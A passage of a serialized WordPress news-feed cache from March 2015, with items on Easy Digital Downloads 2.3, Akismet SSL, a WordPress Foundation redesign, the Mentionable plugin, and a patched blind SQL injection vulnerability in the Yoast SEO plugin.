Improvements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40484\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://wptavern.com/edd-2-3-introduces-new-customer-management-interface-and-performance-improvements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4339:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/EasyDigitalDownloadsFeaturedImage.png\" rel=\"prettyphoto[40484]\"><img class=\"aligncenter size-full wp-image-40496\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/EasyDigitalDownloadsFeaturedImage.png?resize=620%2C223\" alt=\"EasyDigitalDownloadsFeaturedImage\" /></a></p>\n<p>Easy Digital Downloads 2.3 is <a title=\"https://easydigitaldownloads.com/blog/version-2-3-released/\" href=\"https://easydigitaldownloads.com/blog/version-2-3-released/\">available for download</a> and includes new features along with performance improvements. One of the highlights is the new customer management interface. The improved interface lets you quickly browse customer data in an intuitive fashion. There’s also some new API’s that allow developers to interact with customer data behind the scenes.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/EDD23CustomerManagmentInterface.png\" rel=\"prettyphoto[40484]\"><img class=\"size-full wp-image-40487\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/EDD23CustomerManagmentInterface.png?resize=1025%2C808\" alt=\"New Customer Management Interface\" /></a>New Customer Management Interface\n<p>File download URLs are more secure, have better performance, and are more reliable. URLs now contain secure tokens and expiration dates to maintain the security of files. This decreases the likelihood of individuals being able to tamper with downloadable files. URLs are also shorter and easier to share.</p>\n<p>EDD 2.3 significantly improves stat tracking. For example, when you add or remove Download products on an existing payment record, the earnings and sales for the affected products are now properly updated when the payment record is saved. Performance improvements to reports include:</p>\n<ul>\n<li>Tax reports are now much more efficient</li>\n<li>A race condition related to the update process for Download earnings / sales has been resolved</li>\n<li>Individual customer stats are now much more performant</li>\n<li>The Sales / Earnings widget on the Dashboard now loads via Ajax to improve the first-load performance</li>\n</ul>\n<p>According <a title=\"https://twitter.com/chriscct7/status/575724923899023360\" href=\"https://twitter.com/chriscct7/status/575724923899023360\">to Chris Christoff</a>, core developer of EDD, the product has officially passed 10,000 commits made by 121 people since its inception on Github. Pippin Williamson, founder of EDD, states on Twitter that even though the release adds substantial features, the code base has shrunk significantly.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Thanks to the keen eyes of <a href=\"https://twitter.com/andyfragen\">@andyfragen</a>, it\'s been noticed that the EDD code base shrunk significantly with 2.3, even though we add a LOT</p>\n<p>— Pippinsplugins (@pippinsplugins) <a href=\"https://twitter.com/pippinsplugins/status/575721400650043392\">March 11, 2015</a></p></blockquote>\n<p></p>\n<p>EDD 2.3 has eight other notable improvements:</p>\n<ul>\n<li>Download products can now be added to the cart with multiple price IDs at one time</li>\n<li>Better support for the <a href=\"https://wordpress.org/plugins/polylang/\" target=\"_blank\">Polylang</a> plugin has been added</li>\n<li>PayPal Buy Now buttons no longer create pending payment records on each click</li>\n<li>A new {ip_address} email tag has been added</li>\n<li>Numerous new action hooks and filters have been added for developers</li>\n<li>Numerous translation files have been added and several new languages as well</li>\n<li>The display of items in the cart widget has been improved to properly show quantities</li>\n<li>A large number of minor PHP issues have been resolved</li>\n</ul>\n<p>The full list of bugs and improvements is <a title=\"https://github.com/easydigitaldownloads/Easy-Digital-Downloads/issues?q=is%3Aissue+milestone%3A2.3+is%3Aclosed\" href=\"https://github.com/easydigitaldownloads/Easy-Digital-Downloads/issues?q=is%3Aissue+milestone%3A2.3+is%3Aclosed\">available on Github</a>. You can <a title=\"https://wordpress.org/plugins/easy-digital-downloads/\" href=\"https://wordpress.org/plugins/easy-digital-downloads/\">download 2.3</a> from the WordPress plugin directory or update from within WordPress by visiting the Updates screen.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 23:18:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WPTavern: WordPress Foundation Website Gets a Redesign\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40035\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wptavern.com/wordpress-foundation-website-gets-a-redesign\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3663:\"<p>The <a href=\"http://wordpressfoundation.org/\" target=\"_blank\">WordPress Foundation</a> website is sporting a fresh coat of paint, based on the Twenty Fifteen default theme released with <a href=\"http://wptavern.com/wordpress-4-1-dinah-released\" target=\"_blank\">WordPress 4.1</a> last December. The foundation exists to further the mission of the open source project, most importantly by ensuring free access to the software for years to come. It also serves to protect the WordPress-related trademarks and educate the public about the software.</p>\n<p>With that mission at its core, it’s fitting that the foundation selected Twenty Fifteen for the new look. Matt Mullenweg, founder of the organization, <a href=\"https://twitter.com/photomatt/status/573256190462984192\" target=\"_blank\">identified</a> Automattic employee <a href=\"https://twitter.com/NickHamze\" target=\"_blank\">Nick Hamze</a> as responsible for the foundation’s updated design.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/wordpress-foundation.png\" rel=\"prettyphoto[40035]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/wordpress-foundation.png?resize=1025%2C703\" alt=\"wordpress-foundation\" class=\"aligncenter size-full wp-image-40473\" /></a></p>\n<p>When we offered a <a href=\"http://wptavern.com/first-look-at-designs-for-the-twenty-fifteen-default-wordpress-theme\" target=\"_blank\">first look at the design of Twenty Fifteen</a> prior to its release, readers made it clear that this theme would be more enthusiastically received than any other default theme in WordPress’ recent history. Twenty Fifteen offers users a clean canvas that easily lends itself to customization.</p>\n<p>Nick Hamze’s personal <a href=\"http://blog.nickhamze.com/\" target=\"_blank\">blog</a> is another beautiful example of a Twenty Fifteen customization in the wild.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/nick-hamze.png\" rel=\"prettyphoto[40035]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/nick-hamze.png?resize=1025%2C688\" alt=\"nick-hamze\" class=\"aligncenter size-full wp-image-40474\" /></a></p>\n<p>WordCamps in particular are making excellent use of the default theme as a base for their event websites. <a href=\"http://maine.wordcamp.org/2015/\" target=\"_blank\">WordCamp Maine 2015</a> is a prime example of how designers are creatively adapting Twenty Fifteen:</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/wordcamp-maine.png\" rel=\"prettyphoto[40035]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/wordcamp-maine.png?resize=1025%2C713\" alt=\"wordcamp-maine\" class=\"aligncenter size-full wp-image-40475\" /></a></p>\n<p><a href=\"http://london.wordcamp.org/2015/\" target=\"_blank\">WordCamp London 2015</a> organizers used the default theme to bring a grunge look to their site with the help of Google fonts and spray paint style backgrounds.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/wordcamp-london.png\" rel=\"prettyphoto[40035]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/wordcamp-london.png?resize=1025%2C713\" alt=\"wordcamp-london\" class=\"aligncenter size-full wp-image-40477\" /></a></p>\n<p>Armed with a unique background image and a little bit of color inspiration, it’s easy for anyone to make their own totally unique version of Twenty Fifteen. Thanks to the options built into the customizer, you may not even need to create a child theme.</p>\n<p>Where else have you seen <a href=\"https://wordpress.org/themes/twentyfifteen/\" target=\"_blank\">Twenty Fifteen</a> in the wild?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 22:44:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: Akismet Improves User Privacy by Encrypting API Calls\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40459\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://wptavern.com/akismet-improves-user-privacy-by-encrypting-api-calls\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2837:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/AkismetSSLFeaturedImage.png\" rel=\"prettyphoto[40459]\"><img class=\"size-full wp-image-40462\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/AkismetSSLFeaturedImage.png?resize=656%2C301\" alt=\"Akismet SSL Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/61423903@N06/7557181168\">Secure Cloud Computing</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>Akismet 3.1 <a title=\"https://blog.akismet.com/2015/03/11/akismet-3-1-wordpress/\" href=\"https://blog.akismet.com/2015/03/11/akismet-3-1-wordpress/\">is available for download</a> and contains a bug fix that prevents it from inadvertently modifying a comment’s content during the spam filtering process. In addition to the bug fix, calls made to the Akismet API are now encrypted via SSL.</p>\n<p>While it may not seem like much on the surface, encrypting communications between WordPress and Akismet is an important change that increases the privacy of those who leave comments on your site. Christopher Finke, who works on the Akismet development team, explains why:</p>\n<blockquote><p>Akismet’s API is being offered over SSL for the same reason that all <a href=\"http://wordpress.com\">wordpress.com</a> subdomains are <a title=\"https://en.blog.wordpress.com/2014/06/05/reset-the-net/\" href=\"https://en.blog.wordpress.com/2014/06/05/reset-the-net/\">now served over SSL by default</a>. Encrypting that connection decreases the chances of surveillance by a third-party. No matter what a commenter is writing about, sending their comment to be checked using SSL ensures that it will only be read by those who are meant to read it.</p></blockquote>\n<p>The move is part of a larger effort to apply SSL across WordPress.com and WordPress.org. In late 2014, almost all of WordPress.org <a title=\"https://make.wordpress.org/meta/2014/09/23/wordpress-org-is-now-forced-ssl/\" href=\"https://make.wordpress.org/meta/2014/09/23/wordpress-org-is-now-forced-ssl/\">was transitioned</a> to load over SSL/HTTPS. As part of the security hardening process of WordPress 3.7, <a title=\"http://codex.wordpress.org/WordPress.org_API\" href=\"http://codex.wordpress.org/WordPress.org_API\">api.wordpress.org,</a> which handles theme, plugin, and core updates, was forced to use SSL if the webserver supports it.</p>\n<p>If you’re not sure what SSL is or would like to learn how to implement it on your site, read the <a title=\"https://make.wordpress.org/support/user-manual/web-publishing/https-for-wordpress/\" href=\"https://make.wordpress.org/support/user-manual/web-publishing/https-for-wordpress/\">HTTPS section in the WordPress user manual</a>. It has an introduction to the protocol and provides tips on implementing, tweaking, and applying good practices</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 21:12:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"WPTavern: Blind SQL Injection Vulnerability Discovered in WordPress SEO Plugin by Yoast: Immediate Update Recommended\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40433\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"http://wptavern.com/blind-sql-injection-vulnerability-discovered-in-wordpress-seo-plugin-by-yoast-immediate-update-recommended\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4095:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/yoast.jpg\" rel=\"prettyphoto[40433]\"><img class=\"aligncenter size-full wp-image-40456\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/yoast.jpg?resize=1025%2C457\" alt=\"yoast\" /></a></p>\n<p>A blind SQL injection vulnerability was discovered today in the popular <a href=\"https://wordpress.org/plugins/wordpress-seo/\" target=\"_blank\">WordPress SEO plugin by Yoast</a>. WPScanVulnerability Database <a href=\"https://wpvulndb.com/vulnerabilities/7841\" target=\"_blank\">issued an advisory</a> after responsibly disclosing the vulnerability to the plugin’s author:</p>\n<blockquote><p>The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.</p>\n<p>The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.</p></blockquote>\n<p>Yoast was quick to respond with a patch and released version 1.7.4 with the following security fix:</p>\n<blockquote><p>Fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor. Thanks <a href=\"https://github.com/ethicalhack3r\" target=\"_blank\">Ryan Dewhurst</a> from WPScan for discovering and responsibly disclosing this issue.</p></blockquote>\n<h3>Immediate Update Advised</h3>\n<p>Users running the most recent version are advised to update immediately. If you’re using Jetpack on all your sites, you can quickly update them by visiting: <a href=\"https://wordpress.com/plugins/wordpress-seo\" target=\"_blank\">https://wordpress.com/plugins/wordpress-seo</a>. There you will see all the sites where you have the plugin installed and can update from your centralized dashboard.</p>\n<p>Hosting companies are scrambling to add a fix to protect customers. The Pressable status blog sent out an <a href=\"http://status.pressable.com/2015/03/11/wordpress-seo-vulnerability/\" target=\"_blank\">advisory</a> on the vulnerability and is immediately updating installations where the plugin is active:</p>\n<blockquote><p>Our systems have already begun updating this plugin across all impacted sites on our systems, and we expect this process to be completed shortly.</p></blockquote>\n<p>SiteGround has added a <a href=\"https://www.siteground.com/blog/wordpress-seo-by-yoast-vulnerability/\" target=\"_blank\">temporary fix</a> to tide customers over in the meantime before they have the chance to update. The company added new security rules to its WAF (web application firewall), which will actively filter any possible incoming hacking attempts that try to exploit the vulnerability.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Our security team has just added a fix to protect customers from a vulnerability in <a href=\"https://twitter.com/hashtag/WP?src=hash\">#WP</a> SEO plugin by Yoast <a href=\"https://t.co/nP9qrJaO0x\">https://t.co/nP9qrJaO0x</a></p>\n<p>— SiteGround (@SiteGround) <a href=\"https://twitter.com/SiteGround/status/575701133550878720\">March 11, 2015</a></p></blockquote>\n<p></p>\n<p><a href=\"https://wordpress.org/plugins/wordpress-seo/\" target=\"_blank\">WordPress SEO by Yoast</a> is active on more than one million websites. While many hosts are being proactive about getting plugin updates to customers, most of the plugin’s users will not be able to rely on their host to take care of the update. Keeping your site safe from the vulnerability is as easy as logging in and updating to the latest version.</p>\n<p><em><strong>Update</strong></em> Joost de Valk <a title=\"https://yoast.com/wordpress-seo-security-release/\" href=\"https://yoast.com/wordpress-seo-security-release/\">published an update</a> discussing the vulnerabilities and what is fixed.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 18:13:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"Akismet: Akismet 3.1 Plugin for WordPress Released\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1794\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://blog.akismet.com/2015/03/11/akismet-3-1-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1197:\"<p>Version 3.1 of <a href=\"http://wordpress.org/plugins/akismet/\">the Akismet plugin for WordPress</a> is now available.</p>\n<p>As of version 3.1, all calls to the Akismet API are now made using SSL, increasing the confidentiality of your commenters’ data as it travels over the wire. Developers of other Akismet libraries are now free to use <code>https</code> URLs for Akismet API endpoints as well.</p>\n<p>This update also includes a bugfix that prevents Akismet from inadvertently modifying a comment’s content during the spam filtering process.</p>\n<p>To upgrade, visit the Updates page of your WordPress dashboard and follow the instructions. If you need to download the plugin zip file directly, links to all versions are available in <a href=\"http://wordpress.org/plugins/akismet/\">the WordPress plugins directory</a>.</p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1794/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1794/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1794&subd=akismet&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 17:00:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Christopher Finke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Lessons from Jetpack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44701\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/03/lessons-from-jetpack/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:375:\"<blockquote><p>Personally I can say that it was the Jetpack features that helped provide the defaults that got me hooked on WordPress. If it weren’t for that, I wouldn’t be where I am today.</p></blockquote>\n<p>Josh Pollock at Torque writes about <a href=\"http://torquemag.io/lessons-can-learn-jetpack-helped-wordpress-succeed/\">Lessons we can learn from Jetpack</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 03:01:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"WPTavern: Mentionable Plugin Adds @mentions for WordPress Content with Inline Autocomplete\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=39424\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"http://wptavern.com/mentionable-plugin-adds-mentions-for-wordpress-content-with-inline-autocomplete\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3037:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/links.jpg\" rel=\"prettyphoto[39424]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/links.jpg?resize=1024%2C508\" alt=\"photo credit: gordon2208 - cc\" class=\"size-full wp-image-36986\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/gordon2208/4987669000/\">gordon2208</a> – <a href=\"http://creativecommons.org/licenses/by-nc-nd/2.0/\">cc</a>\n<p>Finding and linking to previously published content on your site is a daily necessity for bloggers and content managers. Usually, you have to search the frontend of your site or search posts/pages in the admin to track down the content you’re trying to link.</p>\n<p><a href=\"https://wordpress.org/plugins/mentionable/\" target=\"_blank\">Mentionable</a> is a handy tool, created by the folks at <a href=\"https://xwp.co/\" target=\"_blank\">XWP</a>, that saves a lot of time on internal linking. The plugin adds @mentions to the visual editor with autocomplete for any content published on the site, including posts, pages, media, and custom post types.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/mentionable.png\" rel=\"prettyphoto[39424]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/03/mentionable.png?resize=843%2C438\" alt=\"mentionable\" class=\"aligncenter size-full wp-image-40405\" /></a></p>\n<p>Mentionable includes a settings panel for specifying the post types for which the plugin will be active. You can also select the post types that the auto-completion will match against. Users can further customize the plugin by replacing the mentionable tag with a custom <em>mentionable.php</em> template.</p>\n<p>The support for custom post types means that users can call out recipes, books, movies, products, or posts from any registered content type as links within pages or posts. This makes it easy to link to the backstory for new content, put together quick reference lists, cross promote products, etc. – all without ever having to leave the post editor.</p>\n<p>I tested the plugin and found that it works as advertised. When mentioning a post you don’t even have to start with the first word of the post title. The autocomplete will pick up any word found in a title, in case your memory of the exact title is foggy.</p>\n<p>If you decide later on that you don’t want to use the plugin anymore, it won’t affect any of the links you created previously. Your content remains intact even after the plugin is deactivated and uninstalled.</p>\n<p>A healthy amount of internal linking is often recommended for boosting your site’s SEO. According to Moz, <a href=\"http://moz.com/learn/seo/internal-link\" target=\"_blank\">internal links</a> are critical for establishing site architecture and spreading link juice. If you’re not in the habit of linking to your own content, the <a href=\"https://wordpress.org/plugins/mentionable/\" target=\"_blank\">Mentionable</a> plugin will help you do it with minimal effort.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 Mar 2015 01:17:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah 